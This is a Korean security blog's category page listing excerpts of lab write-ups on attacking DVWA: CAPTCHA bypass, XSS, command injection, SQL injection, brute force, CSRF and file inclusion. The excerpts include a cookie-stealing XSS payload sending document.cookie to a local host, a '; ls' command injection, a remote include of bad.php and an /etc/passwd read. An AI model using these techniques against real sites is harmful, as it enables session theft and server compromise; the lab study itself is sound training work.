본문 바로가기

_Metamong

Notice

Recent Posts

Popular Posts

Recent Comments

Link

Calendar

Tags

더보기

Archives

Visits

Today

Yesterday

Hacking Study/Web Hacking

Hacking Study/Web Hacking 2024. 5. 27. [DVWA] 캡차(CAPTCHA) 공격 Security Level : low 패스워드 hacker를 입력합니다. 캡차가 확인되었습니다. 버프스위트 히스토리를 살펴보니 첫 번째 요청 step이라는 파라미터에 1이라는 값이 설정되어 있고, 입력했던 패스워드 hacker가 두 번 보내지고 있습니다. 그리고 g-recaptcha-response는 캡차를 확인할 때 계속 랜덤해서 생성되는 값입니다. Step은 2라는 값이 설정되었고 패스워드가 한 번 더 전송되었습니다. 두 번째 요청을 Send to Repeater합니다. 패스워드를 hacker 대신 normal로 바꾸고 Send합니다. Render 탭에서 패스워드가 변경되었다는 메시지가 나옵니다. Security Level : medium 기존 패스워드와 캡차를 진행 후 Change..

Hacking Study/Web Hacking 2024. 5. 25. [DVWA] XSS(크로스 사이트 스크립팅) 공격 Security Level : low 1. 리플렉티드 XSS공격자가 만든 악성 스크립트가 서버에 저장되지 않고, 사용자가 특정 URL이나 입력값에 의해 즉시 실행되는 방식입니다. alice를 입력해보면 입력한 값이 그대로 리턴됩니다. 크로스 사이트 스크립팅 취약점이 있다면 아래 그림과 같이 스크립트가 실행됩니다. alert 함수에 의해서 1이라는 값이 출력되었습니다. 이번에는 를 입력하여 쿠키의 값을 출력합니다. 쿠키값을 다른 시스템으로 전달해봅니다. 먼저 터미널에서 tail –f /opt/lampp.logs.access.log를 실행하여 로그를 확인합니다. 브라우저에서document.location='http://127.0.0.1/cookie?'+document.cookie>를 입력하고 로그를 보..

Hacking Study/Web Hacking 2024. 5. 25. [DVWA] 커맨드 인젝션 공격 Security Level : low IP 주소를 입력하면 Ping을 실행한 후 결과를 리턴해주는 페이지입니다. 로컬 IP 주소인 127.0.0.1을 입력하고 실행하면 몇 초 정도 지나면 결과가 리턴됩니다. 소스 코드를 보면 shell_exec 함수는 시스템 명령어를 내리는 함수입니다. ping –c 4에 $target 이라는 변수가 오는데 이 target 변수는 request 즉 웹 요청으로부터 전달된 ip 값임을 알 수 있습니다. 터미널에서는 ping –c 4 127.0.0.1 식으로 실행하게 되는데 여기서 –c는 핑을 보내는 횟수를 의미합니다. ping –c 4 127.0.0.1 세미콜론과 ls를 입력하면 디렉토리 내용이 출력됩니다 ip를 주지 않고 ls와 같이 입력하는 것도 가능합니다. ..

Hacking Study/Web Hacking 2024. 5. 24. [DVWA] SQL 인젝션 공격 공격 구문> Security Level : low 1. WHERE 구문 우회 1이라는 값을 넣으면 아이디가 1인 사용자의 정보가 출력됩니다. SQL 인젝션 공격에 취약한지 알아보는 가장 기본적인 방법은 작은 따옴표를 입력해보는 것입니다. 취약한 페이지의 경우 아래 그림과 같이 SQL 관련 에러가 발생합니다. 소스 코드를 보면 id라는 변수는 이미 작은 따옴표로 둘러싸여져 있기 때문에 하나 더 들어오게 되면 작은 따옴표가 총 3개가 되면서 에러가 발생하게 되는 것입니다. 이렇게 SQL Query문이 잘못되어 에러가 발생하면 그 페이지는 SQL Query문을 이용하여 처리가 된다는 뜻이 됩니다. 그리고 입력한 값으로 인해 SQL Query문이 바뀌었기 때문에 SQL Query문을 조작할 수 있다는 뜻..

Hacking Study/Web Hacking 2024. 5. 24. [DVWA] 브루트 포스 공격 Security Level : low 1. 자동 브루트 포스 공격먼저 Username과 password를 아무 값을 하나 입력합니다. 그러고 나서 프록시의 http 히스토리 탭에서 가장 최근의 요청을 찾습니다. 가장 최근에 요청의 내용을 보면 Username은 admin과 password는 aaaa와 같이 표시되어 있습니다. 이 요청을 Send to Repeater를 클릭해서 Intruder 기능으로 보냅니다. Intruder탭에서 새로운 요청을 확인할 수 있습니다. 패스워드의 값만 테스트할 것이기 때문에 패스워드 부분만 선택하고 Add를 누릅니다. 이제 페이로드 타입에서 Brute Forcer라는 것을 선택합니다. 아래 그림과 같이 a에서 z까지 그리고 0에서 9까지 설정되어 있습니다. 우측 위..

Hacking Study/Web Hacking 2024. 5. 23. 정보 수집과 대응 방법 배너를 통한 정보 수집 서버의 응답을 통해 정보를 수집하는 방법을 배너 그래빙(banner grabbing)이라고 한다. 응답 헤더의 정보는 웹 브라우저에서 제공하는 개발자 도구(단축기 F12)를 이용하여 쉽게 확인할 수 있다. 기본 설치 파일을 통한 시스템 정보 수집웹 어플리케이션을 운영하기 위한 웹 서버와 웹 프레임워크, 기타 구성 요소를 설치할 때 기본으로 설치되는 파일로 인해 호스트 환경에 대한 정보가 노출되는 경우가 있다. 웹 취약점 스캐닝자동화된 프로그램을 이용하여 웹사이트의 여러 가지 정보를 수집하고 이 정보들을 바탕으로 어떤 취약점이 있는지 알아내는 과정이다. 서버 헤더 및 PHP, 아파치 등의 버전이 오래 되었다. 디렉터리 인덱싱웹 서버의 잘못된 설정으로 웹 서버 디렉터리의..

Hacking Study/Web Hacking 2024. 5. 21. [DVWA] 크로스 사이트 요청 위조(CSRF) 공격 Security Level : low 패스워드를 normal로 변경합니다. 히스토리탭에서 요청을 찾아서 보면 get 요청이 전달되고 password_new와 password_conf라는 파라미터가 normal이라는 값이 두 번 전달되고 있습니다. 준비된 실습 파일 내용에는 패스워드 파라미터 normal이란 값 대신에 hacker로 설정을 해두었습니다. 링크를 누르게 되면 poc라는 함수가 실행될 수 있도록 하여 요청이 DVWA로 전송될 수 있도록 만들어져있습니다. Security Level : medium HTTP_REFERER라는 코드가 REFERRER_HEADER를 검사하는 부분입니다. 이 레퍼러주소가 서버 주소와 동일한지 비교함으로써 실제로 사용자가 정상적인 경로를 통해 요청을 한..

Hacking Study/Web Hacking 2024. 5. 21. [DVWA] 파일 인클루젼 공격 Security Level : low - 리모트파일 인클루젼(RFI) : 외부에 있는 파일을 원격으로 인클루드 include.php파일이 include되어 이 전체 페이지를 표시하고 있습니다. 먼저 페이지 파라미터에다가 http://127.0.0.1/bad.php와 같이 입력하면 RFI Success가 표시되었습니다. 웹서버에 미리 저장한 실습용 파일을 dvwa에서 실행시킬 수 있게 됩니다. 시스템이라는 함수를 사용해 명령어를 실행시켜봅니다. - 로컬파일 인클루젼(LFI) : 이미 시스템에 존재하는 파일을 인클루드 페이지 파라미터에다가 /etc/passwd를 직접 입력해보면 파일의 내용이 출력됩니다. 패스 트래버설(Path Traversal)를 이용하면 현재 경로에 상위 디렉토리로 접근하는 ..

이전 1 2 다음

티스토리툴바